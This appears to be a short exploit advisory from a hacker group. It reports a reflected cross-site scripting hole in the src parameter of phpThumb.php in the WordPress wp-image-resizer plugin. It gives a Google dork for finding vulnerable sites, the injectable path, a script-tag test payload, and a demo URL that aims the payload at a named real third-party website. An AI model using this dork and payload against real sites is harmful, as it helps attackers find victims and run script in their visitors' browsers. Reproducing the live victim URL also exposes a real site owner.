#######################################################################
# Exploit Title : Wordpress wp-image-resizer Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content/plugins/wp-image-resizer/  
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/10/16
#
#############################################
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/wp-image-resizer/thumb/phpThumb.php?src=[Xss]
#
#
# Script For Test : ?src=<Script>alert(/loool/)</Script>
#
##########################################
# Demo
#http://kellyludwig.com/govstumpys/wp-content/plugins/wp-image-resizer/thumb/phpThumb.php?src=%3CScript%3Ealert%28/test/%29%3C/Script%3E
##############
#
# Milad Hacking
#
# We Love Mohammad
#
##############